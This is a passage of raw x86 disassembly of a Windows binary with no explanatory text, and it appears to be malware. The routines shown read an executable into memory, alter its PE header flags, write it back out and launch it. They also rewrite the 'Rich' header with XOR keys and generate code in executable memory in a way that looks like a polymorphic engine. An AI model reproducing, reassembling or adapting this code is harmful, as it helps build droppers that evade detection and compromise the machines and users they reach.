mul ecx
mov edi, eax
push edi
push dword ptr [ebx+8]
push esi
call sub_40F5BF
mov ecx, [ebx+4]
jmp short loc_40F5A5
; ---------------------------------------------------------------------------
loc_40F59E: ; CODE XREF: sub_40F550+57�j
mov [esi+4], ebx
add esi, 0Ch
dec ecx
loc_40F5A5: ; CODE XREF: sub_40F550+4C�j
or ecx, ecx
jnz short loc_40F59E
mov eax, [ebx+0Ch]
or eax, eax
jz short loc_40F5B5
push [ebp+var_4]
call eax
loc_40F5B5: ; CODE XREF: sub_40F550+5E�j
mov eax, [ebp+var_4]
pop ebx
pop esi
pop edi
leave
retn 4
sub_40F550 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F5BF proc near ; CODE XREF: sub_403FF0+71�p
; sub_404CC5+61�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+arg_8]
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
pop ebx
pop esi
pop edi
leave
retn 0Ch
sub_40F5BF endp
; ---------------------------------------------------------------------------
db 8Dh
dd 24A4h, 9B8D0000h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F5F0 proc near ; CODE XREF: sub_403FF0+F5�p
; sub_408A40+16�p ...
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
mov ecx, [ebp+arg_8]
xor eax, eax
mov edi, [ebp+arg_0]
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
pop edi
leave
retn 0Ch
sub_40F5F0 endp
; ---------------------------------------------------------------------------
db 90h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ebx, [ebp+8]
mov esi, [ebx+4]
mov edi, [esi+4]
mov eax, [esi+20h]
or eax, eax
jnz short loc_40F66D
xor ebx, ebx
add esi, 90h
jmp short loc_40F65D
; ---------------------------------------------------------------------------
loc_40F630: ; CODE XREF: rdata:0040F65F�j
push dword ptr [esi+8]
push dword ptr [ebp+0Ch]
call sub_414420
cmp eax, 1
jnz short loc_40F659
lea eax, [esi]
mov ecx, [ebp+10h]
mov [ecx], eax
mov edx, [ebp+8]
mov edx, [edx]
push dword ptr [ebp+8]
call dword ptr [edx+4]
pop ebx
pop esi
pop edi
leave
retn 0Ch
; ---------------------------------------------------------------------------
loc_40F659: ; CODE XREF: rdata:0040F63E�j
dec edi
add esi, 0Ch
loc_40F65D: ; CODE XREF: rdata:0040F62E�j
cmp edi, ebx
jnz short loc_40F630
mov ecx, [ebp+10h]
mov [ecx], ebx
mov eax, 80004002h
jmp short loc_40F67A
; ---------------------------------------------------------------------------
loc_40F66D: ; CODE XREF: rdata:0040F624�j
mov edx, eax
mov edx, [edx]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push eax
call dword ptr [edx]
loc_40F67A: ; CODE XREF: rdata:0040F66B�j
pop ebx
pop esi
pop edi
leave
retn 0Ch
; ---------------------------------------------------------------------------
db 8Dh, 0A4h, 24h
align 8
dd 24A48Dh, 90000000h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ebx, [ebp+8]
mov esi, [ebx+4]
mov eax, [esi+20h]
or eax, eax
jnz short loc_40F6A9
inc dword ptr [esi]
mov eax, [esi]
jmp short loc_40F6B1
; ---------------------------------------------------------------------------
loc_40F6A9: ; CODE XREF: rdata:0040F6A1�j
mov edx, eax
mov edx, [edx]
push eax
call dword ptr [edx+4]
loc_40F6B1: ; CODE XREF: rdata:0040F6A7�j
pop ebx
pop esi
pop edi
leave
retn 4
; ---------------------------------------------------------------------------
dd 24A48Dh, 90000000h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push esi
push edi
push ebx
mov ebx, [ebp+8]
mov edi, [ebx+4]
mov eax, [edi+20h]
or eax, eax
jnz short loc_40F706
dec dword ptr [edi]
mov eax, [edi]
or eax, eax
jnz short loc_40F70E
mov ecx, [edi+10h]
or ecx, ecx
jz short loc_40F6E7
push dword ptr [ebp+8]
call ecx
loc_40F6E7: ; CODE XREF: rdata:0040F6E0�j
dec dword_41BED0
mov ecx, [edi+14h]
or ecx, ecx
jz short loc_40F6FC
mov edx, ecx
mov edx, [edx]
push ecx
call dword ptr [edx+8]
loc_40F6FC: ; CODE XREF: rdata:0040F6F2�j
push edi
call sub_40A296
xor eax, eax
jmp short loc_40F70E
; ---------------------------------------------------------------------------
loc_40F706: ; CODE XREF: rdata:0040F6D1�j
mov edx, eax
mov edx, [edx]
push eax
call dword ptr [edx+8]
loc_40F70E: ; CODE XREF: rdata:0040F6D9�j
; rdata:0040F704�j
pop ebx
pop edi
pop esi
leave
retn 4
; ---------------------------------------------------------------------------
db 8Dh, 0A4h, 24h
dd 0
dd 24648Dh
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov edi, [ebp+0Ch]
or edi, edi
jnz short loc_40F734
mov eax, 80004003h
jmp short loc_40F73F
; ---------------------------------------------------------------------------
loc_40F734: ; CODE XREF: rdata:0040F72B�j
mov esi, offset byte_41A195
movsd
movsd
movsd
movsd
xor eax, eax
loc_40F73F: ; CODE XREF: rdata:0040F732�j
pop ebx
pop esi
pop edi
leave
retn 8
; ---------------------------------------------------------------------------
dw 0CCCCh
dd 2 dup(0CCCCCCCCh)
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push edi
push esi
push ebx
cmp dword ptr [ebp+0Ch], 0
jz short loc_40F764
mov eax, 80040110h
loc_40F764: ; CODE XREF: rdata:0040F75D�j
mov edi, [ebp+8]
mov edi, [edi+4]
lea esi, word_41A13A
mov ebx, [esi]
add esi, 4
jmp short loc_40F7BD
; ---------------------------------------------------------------------------
loc_40F777: ; CODE XREF: rdata:0040F7BF�j
push dword ptr [edi+1Ch]
push dword ptr [esi]
call sub_414420
cmp eax, 1
jnz short loc_40F7BA
push dword ptr [esi+4]
call sub_40F550
mov [ebp-4], eax
or eax, eax
jnz short loc_40F7A3
mov eax, 8007000Eh
pop ebx
pop esi
pop edi
leave
retn 10h
; ---------------------------------------------------------------------------
db 0EBh, 17h
; ---------------------------------------------------------------------------
loc_40F7A3: ; CODE XREF: rdata:0040F793�j
mov edx, [ebp-4]
mov edx, [edx]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp-4]
call dword ptr [edx]
pop ebx
pop esi
pop edi
leave
retn 10h
; ---------------------------------------------------------------------------
loc_40F7BA: ; CODE XREF: rdata:0040F784�j
add esi, 8
loc_40F7BD: ; CODE XREF: rdata:0040F775�j
or ebx, ebx
jnz short loc_40F777
pop ebx
pop esi
pop edi
leave
retn 10h
; ---------------------------------------------------------------------------
dd 24A48Dh, 90000000h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 1
jnz short loc_40F7E1
inc dword_41BED0
jmp short loc_40F7E7
; ---------------------------------------------------------------------------
loc_40F7E1: ; CODE XREF: rdata:0040F7D7�j
dec dword_41BED0
loc_40F7E7: ; CODE XREF: rdata:0040F7DF�j
xor eax, eax
leave
retn 8
; ---------------------------------------------------------------------------
db 8Dh, 49h, 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov ebx, [ebp+8]
mov ebx, [ebx+4]
mov dword ptr [ebx+2Ch], 0
pop edi
pop esi
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push edi
push esi
mov ebx, [ebp+8]
mov ebx, [ebx+4]
pop esi
pop edi
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
db 3 dup(0CCh)
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFECCh
push edi
push esi
push ebx
call sub_40FC26
mov esi, [ebp+8]
xor ebx, ebx
jmp loc_40F8CA
; ---------------------------------------------------------------------------
loc_40F83B: ; CODE XREF: rdata:0040F8D0�j
lea eax, byte_419FFB
cmp byte ptr [ebx+eax], 1
jnz short loc_40F8C6
mov ecx, [esi+0Ch]
mov ecx, [ecx]
mov edx, [esi+8]
mov edx, [edx]
push ecx
push edx
push dword ptr [esi+4]
lea eax, [ebp-134h]
push eax
call sub_40A0F2
add esp, 10h
lea eax, [ebp-8]
push eax
lea eax, [ebp-4]
push eax
push 0
push 0
push 0
push 0
push 0
lea eax, [ebp-134h]
push eax
push dword ptr [esi]
call sub_414426
push dword ptr [ebp-4]
call sub_40A2B4
lea eax, [ebp-4]
push eax
lea eax, [ebp-134h]
push eax
push dword ptr [esi]
call sub_40A2CC
mov edi, [esi+14h]
mov edi, [edi]
push edi
call sub_40A266
mov edx, [esi+10h]
mov edx, [edx]
push eax
push edi
push 1
push 0
push edx
push dword ptr [ebp-4]
call sub_40A2E4
push dword ptr [ebp-4]
call sub_40A2B4
loc_40F8C6: ; CODE XREF: rdata:0040F845�j
add esi, 18h
inc ebx
loc_40F8CA: ; CODE XREF: rdata:0040F836�j
cmp ebx, dword_41A016
jb loc_40F83B
pop ebx
pop esi
pop edi
leave
retn 4
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFED4h
push edi
push esi
push ebx
call sub_40FC26
mov esi, [ebp+8]
mov ebx, dword_41A016
jmp short loc_40F929
; ---------------------------------------------------------------------------
loc_40F8F9: ; CODE XREF: rdata:0040F92B�j
mov ecx, [esi+0Ch]
mov ecx, [ecx]
mov edx, [esi+8]
mov edx, [edx]
push ecx
push edx
push dword ptr [esi+4]
lea eax, [ebp-12Ch]
push eax
call sub_40A0F2
add esp, 10h
lea eax, [ebp-12Ch]
push eax
push dword ptr [esi]
call sub_41442C
add esi, 18h
dec ebx
loc_40F929: ; CODE XREF: rdata:0040F8F7�j
or ebx, ebx
jnz short loc_40F8F9
pop ebx
pop esi
pop edi
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F934 proc near ; CODE XREF: sub_40FC26+48�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
movzx ecx, byte ptr [eax+0Fh]
push ecx
movzx ecx, byte ptr [eax+0Eh]
push ecx
movzx ecx, byte ptr [eax+0Dh]
push ecx
movzx ecx, byte ptr [eax+0Ch]
push ecx
movzx ecx, byte ptr [eax+0Bh]
push ecx
movzx ecx, byte ptr [eax+0Ah]
push ecx
movzx ecx, byte ptr [eax+9]
push ecx
movzx ecx, byte ptr [eax+8]
push ecx
movzx ecx, word ptr [eax+6]
push ecx
movzx ecx, word ptr [eax+4]
push ecx
push dword ptr [eax]
push offset dword_41A2C8
push [ebp+arg_4]
call sub_40A0F2
add esp, 34h
leave
retn 8
sub_40F934 endp
; ---------------------------------------------------------------------------
dw 0CCCCh
dd 3 dup(0CCCCCCCCh)
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push ebx
mov ebx, [ebp+8]
mov ebx, [ebx+4]
mov ecx, [ebx+2Ch]
or ecx, ecx
jz short loc_40F9AC
mov edx, ecx
mov edx, [edx]
push ecx
call dword ptr [edx+8]
loc_40F9AC: ; CODE XREF: rdata:0040F9A2�j
cmp dword ptr [ebp+10h], 0
jz short loc_40F9C3
mov eax, [ebp+10h]
mov [ebx+2Ch], eax
mov edx, [ebp+10h]
mov edx, [edx]
push dword ptr [ebp+10h]
call dword ptr [edx+4]
loc_40F9C3: ; CODE XREF: rdata:0040F9B0�j
xor eax, eax
pop ebx
leave
retn 10h
; ---------------------------------------------------------------------------
dw 0CCCCh
dd 0CCCCCCCCh
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 0
jnz short loc_40F9E9
cmp dword ptr [ebp+10h], 1
jnz short loc_40F9E1
jmp short loc_40F9FD
; ---------------------------------------------------------------------------
loc_40F9E1: ; CODE XREF: rdata:0040F9DD�j
cmp dword ptr [ebp+10h], 5
jnz short loc_40F9FD
jmp short loc_40F9FD
; ---------------------------------------------------------------------------
loc_40F9E9: ; CODE XREF: rdata:0040F9D7�j
cmp dword ptr [ebp+0Ch], 1
jnz short loc_40F9FD
cmp dword ptr [ebp+10h], 1
jnz short loc_40F9F7
jmp short loc_40F9FD
; ---------------------------------------------------------------------------
loc_40F9F7: ; CODE XREF: rdata:0040F9F3�j
cmp dword ptr [ebp+10h], 5
loc_40F9FB: ; DATA XREF: .text:004019BD�r
; .text:004019CB�r
jnz short $+2
loc_40F9FD: ; CODE XREF: rdata:0040F9DF�j
; rdata:0040F9E5�j ...
xor eax, eax
leave
retn 18h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push esi
mov esi, [ebp+0Ch]
mov ecx, [esi+0Ch]
shr ecx, 10h
and ecx, 0FFFFh
or ecx, ecx
jnz short loc_40FA2F
mov eax, [esi+0Ch]
or ax, ax
jnz short loc_40FA24
jmp short loc_40FA2A
; ---------------------------------------------------------------------------
loc_40FA24: ; CODE XREF: rdata:0040FA20�j
cmp ax, 1
jnz short $+2
loc_40FA2A: ; CODE XREF: rdata:0040FA22�j
pop esi
leave
retn 8
; ---------------------------------------------------------------------------
loc_40FA2F: ; CODE XREF: rdata:0040FA18�j
mov eax, 80070057h
pop esi
leave
retn 8
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push ebx
mov eax, [ebp+14h]
mov [ebp-4], eax
push offset dword_41A348
push 1
push 0
push offset loc_40D880
push 0
push 0
call sub_40A128
inc dword ptr [ebp-4]
mov ebx, [ebp-4]
sub ebx, [ebp+14h]
and ebx, 0FFFFh
mov eax, ebx
pop ebx
leave
retn 18h
; ---------------------------------------------------------------------------
db 0CCh
dd 3 dup(0CCCCCCCCh)
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 0
leave
retn 4
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
xor eax, eax
leave
retn 0Ch
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 80004005h
leave
retn 0Ch
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 80004005h
leave
retn 8
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 80004005h
leave
retn 8
; ---------------------------------------------------------------------------
db 3 dup(0CCh)
dd 0CCCCCCCCh
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push offset dword_41A3B4
push 1
push 0
push offset loc_40D880
push 0
push 0
call sub_40A128
mov eax, 1
leave
retn 18h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
xor eax, eax
pop ebx
leave
retn 18h
; ---------------------------------------------------------------------------
dw 0CCCCh
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push offset dword_41A3E0
push 1
push 0
push offset loc_40D880
push 0
push 0
call sub_40A128
mov eax, 6
pop ebx
leave
retn 20h
; ---------------------------------------------------------------------------
db 3 dup(0CCh)
dd 2 dup(0CCCCCCCCh)
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFE70h
push edi
push esi
push ebx
mov ebx, [ebp+0Ch]
push dword ptr [ebx+10h]
lea eax, [ebp-190h]
push eax
call sub_40A25A
lea eax, [ebp-190h]
push eax
call sub_414402
mov esi, eax
lea edi, aSw0cp8xucxxq6y ; "sW0cp8XUcxxq6y43hcs+PRiHSQX+slLM9J4f7-B"...
jmp short loc_40FB6F
; ---------------------------------------------------------------------------
loc_40FB54: ; CODE XREF: rdata:0040FB72�j
push edi
push esi
call sub_40A254
or eax, eax
jnz short loc_40FB66
pop ebx
pop esi
pop edi
leave
retn 8
; ---------------------------------------------------------------------------
loc_40FB66: ; CODE XREF: rdata:0040FB5D�j
push edi
call sub_40A266
inc eax
add edi, eax
loc_40FB6F: ; CODE XREF: rdata:0040FB52�j
cmp dword ptr [edi], 0
jnz short loc_40FB54
mov eax, 1
pop ebx
pop esi
pop edi
leave
retn 8
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword_41C050
call sub_41440E
mov ecx, [ebp+14h]
mov dword ptr [ecx], 1
mov ecx, [ebp+18h]
mov dword ptr [ecx], 3
xor eax, eax
leave
retn 14h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov dword ptr [ebp+0Ch], 0
xor eax, eax
leave
retn 8
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFDA0h
lea eax, [ebp-260h]
push eax
push 1
push 0
push offset loc_40D880
push 0
push 0
call sub_40A128
mov dword ptr [ebp-25Ch], 1
mov eax, [ebp-25Ch]
leave
retn 0Ch
; ---------------------------------------------------------------------------
dw 0CCCCh
dd 3 dup(0CCCCCCCCh)
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 1
jnz short loc_40FC1D
mov eax, [ebp+8]
mov dword_41C050, eax
call sub_40FC26
mov eax, 1
jmp short locret_40FC22
; ---------------------------------------------------------------------------
loc_40FC1D: ; CODE XREF: rdata:0040FC07�j
mov eax, 0
locret_40FC22: ; CODE XREF: rdata:0040FC1B�j
leave
retn 0Ch
; =============== S U B R O U T I N E =======================================
sub_40FC26 proc near ; CODE XREF: rdata:0040F82C�p
; rdata:0040F8E9�p ...
push edi
push esi
push ebx
push 12Ch
push 0
push dword_41A2C0
call sub_40F5F0
push 12Ch
push dword_41A2C0
push dword_41C050
call sub_40A188
lea ecx, byte_41A195
push ecx
push dword_41A2C0
call sub_414440
push dword_41A2C4
push offset byte_41A195
call sub_40F934
pop ebx
pop esi
pop edi
retn
sub_40FC26 endp
; ---------------------------------------------------------------------------
db 0CCh
dd 2 dup(0CCCCCCCCh)
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFC74h
push edi
push esi
push ebx
push offset loc_41450E
push 1
push 0
call sub_40A11C
mov ds:dword_414791, eax
call sub_40A17C
or eax, eax
jnz loc_40FD80
push ds:dword_414791
call sub_40A0FE
push 12Ch
lea eax, [ebp-384h]
push eax
push dword_41C050
call sub_40A188
push 104h
lea eax, [ebp-12Ch]
push eax
call sub_40A19A
lea ecx, [ebp-12Ch]
cmp byte ptr [eax+ecx-1], 5Ch
jz short loc_40FCF2
mov word ptr [eax+ecx], 5Ch
loc_40FCF2: ; CODE XREF: rdata:0040FCEA�j
lea eax, [ebp-12Ch]
push eax
push (offset loc_414780+4)
lea eax, [ebp-258h]
push eax
call sub_40A0F2
add esp, 0Ch
lea eax, [ebp-38Ch]
push eax
lea eax, [ebp-388h]
push eax
lea eax, [ebp-384h]
push eax
call sub_40FE35
mov edi, [ebp-388h]
cmp word ptr [edi], 5A4Dh
jnz short loc_40FD45
add edi, [edi+3Ch]
cmp dword ptr [edi], 4550h
jnz short loc_40FD45
xor word ptr [edi+16h], 2000h
loc_40FD45: ; CODE XREF: rdata:0040FD32�j
; rdata:0040FD3D�j
push dword ptr [ebp-38Ch]
push dword ptr [ebp-388h]
lea eax, [ebp-258h]
push eax
call sub_40FD94
cmp eax, 0FFFFFFFFh
jz short loc_40FD6E
lea eax, [ebp-258h]
push eax
call sub_40FDED
loc_40FD6E: ; CODE XREF: rdata:0040FD60�j
push 8000h
push 0
push dword ptr [ebp-388h]
call sub_40A230
loc_40FD80: ; CODE XREF: rdata:0040FCA6�j
push ds:dword_414791
call sub_40A0FE
xor eax, eax
pop ebx
pop esi
pop edi
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FD94 proc near ; CODE XREF: rdata:0040FD58�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push edi
push esi
push ebx
push 0
push 80h
push 4
push 0
push 3
push 40000000h
push [ebp+arg_0]
call sub_40A110
cmp eax, 0FFFFFFFFh
jz short loc_40FDE6
mov [ebp+var_4], eax
push 0
push 0
push 0
push [ebp+var_4]
call sub_40A206
push 0
push esp
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+var_4]
call sub_40A242
push [ebp+var_4]
call sub_40A0FE
loc_40FDE6: ; CODE XREF: sub_40FD94+26�j
pop ebx
pop esi
loc_40FDE8: ; DATA XREF: .text:00401904�o
pop edi
leave
retn 0Ch
sub_40FD94 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FDED proc near ; CODE XREF: rdata:0040FD69�p
var_54 = dword ptr -54h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFACh
push edi
xor eax, eax
lea edi, [ebp+var_54]
mov ecx, 44h
rep stosb
mov [ebp+var_54], 44h
xor edx, edx
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
push edx
push edx
push edx
push edx
push edx
push edx
push [ebp+arg_0]
push edx
call sub_40A122
push [ebp+var_10]
call sub_40A0FE
push [ebp+var_C]
call sub_40A0FE
pop edi
leave
retn 4
sub_40FDED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FE35 proc near ; CODE XREF: rdata:0040FD22�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push edi
push esi
push ebx
mov ebx, 0FFFFFFFFh
push 0
push 80h
push 3
push 0
push 1
push 80000000h
push [ebp+arg_0]
call sub_40A110
mov [ebp+var_4], eax
cmp eax, 0FFFFFFFFh
jz short loc_40FEB2
push 0
push [ebp+var_4]
call sub_40A176
mov [ebp+var_8], eax
push 40h
push 1000h
push [ebp+var_8]
push 0
call sub_40A22A
or eax, eax
jz short loc_40FEB2
mov edi, eax
or eax, eax
jz short loc_40FEB2
mov ecx, [ebp+arg_4]
mov [ecx], edi
push 0
push esp
push [ebp+var_8]
push edi
push [ebp+var_4]
call sub_40A1E8
push [ebp+var_4]
call sub_40A0FE
mov ecx, [ebp+arg_8]
mov eax, [ebp+var_8]
mov [ecx], eax
inc ebx
loc_40FEB2: ; CODE XREF: sub_40FE35+2E�j
; sub_40FE35+50�j ...
mov eax, ebx
pop ebx
pop esi
pop edi
leave
retn 0Ch
sub_40FE35 endp
; ---------------------------------------------------------------------------
db 0CCh
dd 0CCCCCCCCh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FEC0 proc near ; CODE XREF: sub_404DC0+206�p
var_1A0 = dword ptr -1A0h
var_19C = dword ptr -19Ch
var_198 = dword ptr -198h
var_194 = dword ptr -194h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFE60h
push edi
push esi
push ebx
mov [ebp+var_1A0], 0FFFFFFFFh
push [ebp+arg_0]
call sub_410900
or eax, eax
jnz loc_40FFC3
mov esi, [ebp+arg_0]
add esi, 80h
xor ebx, ebx
jmp short loc_40FEF4
; ---------------------------------------------------------------------------
loc_40FEF3: ; CODE XREF: sub_40FEC0+3B�j
inc ebx
loc_40FEF4: ; CODE XREF: sub_40FEC0+31�j
cmp dword ptr [esi+ebx*4], 68636952h
jnz short loc_40FEF3
inc ebx
mov eax, ebx
xor edx, edx
mov ecx, 4
mul ecx
sub eax, 14h
mov ecx, 8
div ecx
mov ebx, eax
mov edi, [esi+4]
add esi, 10h
mov [ebp+var_198], ebx
mov [ebp+var_19C], esi
jmp short loc_40FF47
; ---------------------------------------------------------------------------
loc_40FF29: ; CODE XREF: sub_40FEC0+89�j
mov edx, [esi]
xor edx, edi
xor [esi+4], edi
cmp edx, 10000h
jz short loc_40FF41
call sub_4109E0
mov [esi], eax
jmp short loc_40FF43
; ---------------------------------------------------------------------------
loc_40FF41: ; CODE XREF: sub_40FEC0+76�j
xor [esi], edi
loc_40FF43: ; CODE XREF: sub_40FEC0+7F�j
add esi, 8
dec ebx
loc_40FF47: ; CODE XREF: sub_40FEC0+67�j
or ebx, ebx
jnz short loc_40FF29
mov ebx, [ebp+var_198]
mov esi, [ebp+var_19C]
mov [ebp+var_194], 884F3421h
jmp short loc_40FF74
; ---------------------------------------------------------------------------
loc_40FF63: ; CODE XREF: sub_40FEC0+B6�j
mov edx, [esi]
mov ecx, [esi+4]
rol edx, cl
add [ebp+var_194], edx
add esi, 8
dec ebx
loc_40FF74: ; CODE XREF: sub_40FEC0+A1�j
or ebx, ebx
jnz short loc_40FF63
mov esi, [ebp+arg_0]
add esi, 80h
mov edi, [ebp+var_194]
mov eax, edi
xor eax, 0AA559966h
xor eax, 0F93BF822h
mov [esi], eax
mov [esi+4], edi
mov [esi+8], edi
mov [esi+0Ch], edi
mov ebx, [ebp+var_198]
mov esi, [ebp+var_19C]
jmp short loc_40FFB5
; ---------------------------------------------------------------------------
loc_40FFAC: ; CODE XREF: sub_40FEC0+F7�j
xor [esi], edi
xor [esi+4], edi
add esi, 8
dec ebx
loc_40FFB5: ; CODE XREF: sub_40FEC0+EA�j
or ebx, ebx
jnz short loc_40FFAC
mov [ebp+var_1A0], 0
loc_40FFC3: ; CODE XREF: sub_40FEC0+20�j
mov eax, [ebp+var_1A0]
pop ebx
pop esi
pop edi
leave
retn 4
sub_40FEC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FFD0 proc near ; CODE XREF: sub_404DC0+171�p
var_608 = dword ptr -608h
var_604 = dword ptr -604h
var_600 = byte ptr -600h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
add esp, 0FFFFF9F8h
push edi
push esi
push ebx
lea eax, [ebp+var_600]
push eax
call sub_405260
lea eax, [ebp+var_600]
mov eax, [eax]
xor edx, edx
mov ecx, 7Fh
div ecx
shr edx, 1
shl edx, 1
movzx edx, dl
add dl, 80h
mov [ebp+var_604], edx
lea eax, [ebp+var_600]
mov eax, [eax+3Ch]
xor edx, edx
mov ecx, 0E000h
div ecx
mov [ebp+var_608], edx
mov ecx, [ebp+arg_10]
add [ebp+var_608], ecx
push 40h
push 1000h
push 1000h
push 0
call sub_40A22A
mov edi, eax
push [ebp+var_604]
push [ebp+var_608]
push edi
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4103F0
mov esi, eax
push 40h
push 1000h
push 1000h
push 0
call sub_40A22A
mov ebx, eax
mov ecx, [ebp+arg_8]
mov [ecx], eax
add [ebp+var_604], 8
add [ebp+var_608], 1000h
push [ebp+var_604]
push [ebp+var_608]
push ebx
push esi
push edi
call sub_4100B1
mov ecx, [ebp+arg_C]
mov [ecx], eax
push 8000h
push 0
push edi
call sub_40A230
pop ebx
pop esi
pop edi
leave
retn 14h
sub_40FFD0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4100B1 proc near ; CODE XREF: sub_40FFD0+C3�p
var_628 = byte ptr -628h
var_614 = dword ptr -614h
var_610 = dword ptr -610h
var_60C = dword ptr -60Ch
var_608 = dword ptr -608h
var_604 = byte ptr -604h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
add esp, 0FFFFF9D8h
push edi
push esi
push ebx
lea eax, [ebp+var_628]
push eax
call sub_410B20
lea eax, [ebp+var_628]
push eax
call sub_410A20
lea eax, [ebp+var_628]
push eax
call sub_410A20
lea eax, [ebp+var_604]
push eax
call sub_405260
lea eax, [ebp+var_604]
mov [ebp+var_610], eax
lea eax, [ebp+var_628]
mov esi, [eax]
mov [ebp+var_608], esi
xor ebx, ebx
jmp short loc_41010F
; ---------------------------------------------------------------------------
loc_41010B: ; CODE XREF: sub_4100B1+61�j
inc ebx
add esi, 4
loc_41010F: ; CODE XREF: sub_4100B1+58�j
cmp dword ptr [esi], 0
jnz short loc_41010B
mov [ebp+var_60C], ebx
mov ebx, [ebp+arg_4]
shr ebx, 2
shl ebx, 2
cmp ebx, [ebp+arg_4]
jz short loc_41012E
add ebx, 4
mov [ebp+var_4], ebx
loc_41012E: ; CODE XREF: sub_4100B1+75�j
mov eax, [ebp+var_610]
mov eax, [eax]
mov ecx, 8
xor edx, edx
div ecx
mov [ebp+var_614], edx
mov edi, [ebp+arg_8]
push [ebp+var_614]
push edi
push [ebp+var_60C]
push [ebp+var_608]
push [ebp+var_610]
call sub_410AC0
mov edx, eax
sub edx, edi
mov edi, eax
mov ecx, 14h
sub ecx, edx
mov [ebp+var_614], ecx
lea esi, aA ; "€"
mov eax, [ebp+arg_10]
mov [esi+3], al
mov eax, [ebp+arg_C]
mov [esi+4], eax
push 8
push offset aA ; "€"
push edi
call sub_40F5BF
add edi, 8
mov esi, [ebp+arg_0]
jmp loc_41038D
; ---------------------------------------------------------------------------
loc_4101A3: ; CODE XREF: sub_4100B1+2DE�j
mov eax, [ebp+var_610]
mov eax, [eax]
mov ecx, 6
xor edx, edx
div ecx
mov [ebp+var_614], edx
push [ebp+var_614]
push edi
push [ebp+var_60C]
push [ebp+var_608]
push [ebp+var_610]
call sub_410AC0
mov edi, eax
mov eax, [ebp+var_610]
mov eax, [eax]
xor edx, edx
mov ecx, 4
div ecx
mov eax, edx
mov ecx, 3
mul ecx
lea ecx, byte_41A4C3
add ecx, eax
mov edx, [ebp+var_610]
mov edx, [edx]
